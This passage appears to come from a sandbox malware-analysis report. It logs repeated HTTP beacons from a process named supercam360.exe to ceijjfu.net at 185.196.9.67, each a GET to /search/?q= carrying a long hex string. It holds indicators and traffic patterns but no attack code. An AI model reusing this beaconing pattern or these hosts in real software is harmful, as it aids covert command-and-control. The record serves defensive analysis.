                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.449778185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:09.393132925 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:10.748431921 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.449779185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:10.987004995 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:12.340059042 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.449785185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:12.580240965 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:13.932415962 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.449791185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:14.175664902 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:15.537405014 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:15 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Dec 25, 2024 09:18:15.648550987 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:16.119919062 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:15 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Dec 25, 2024 09:18:16.225821018 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:16.701416969 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:16 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.449797185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:16.989856005 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:18.342459917 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.449803185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:18.580631018 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:19.930577993 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:19 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.449809185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:20.237310886 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:21.565387011 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:21 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.449810185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:21.815586090 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:23.171648979 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:22 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.449816185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:23.409917116 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:24.759553909 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:24 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Dec 25, 2024 09:18:24.866280079 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:25.338036060 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:25 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.449821185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:25.646245956 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:27.002106905 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.449827185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:27.237009048 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:28.595397949 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.449833185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:28.856695890 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:30.212639093 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.449834185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:30.455754042 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:31.814790010 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  23192.168.2.449840185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:32.049802065 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:33.406331062 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  24192.168.2.449846185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:33.643898964 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:34.998603106 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:34 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  25192.168.2.449849185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:35.236664057 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:36.589770079 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:36 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  26192.168.2.449853185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:36.830290079 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:38.182049036 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:37 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  27192.168.2.449859185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:38.410681963 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:39.767740965 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:39 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  28192.168.2.449865185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:40.057173014 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:41.409452915 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:41 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  29192.168.2.449866185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:41.642649889 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:42.999002934 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:42 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  30192.168.2.449872185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:43.299491882 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:44.649640083 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:44 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Dec 25, 2024 09:18:44.756874084 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:45.234160900 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:45 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
